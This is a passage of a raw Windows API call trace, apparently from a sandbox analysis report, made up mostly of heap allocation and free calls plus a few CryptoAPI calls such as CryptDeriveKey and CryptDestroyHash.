(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51c40 [0259.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51c40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.222] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.223] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87390) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0259.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0259.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.229] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0259.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0259.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.230] CryptDestroyHash (hHash=0xa87490) returned 1 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: 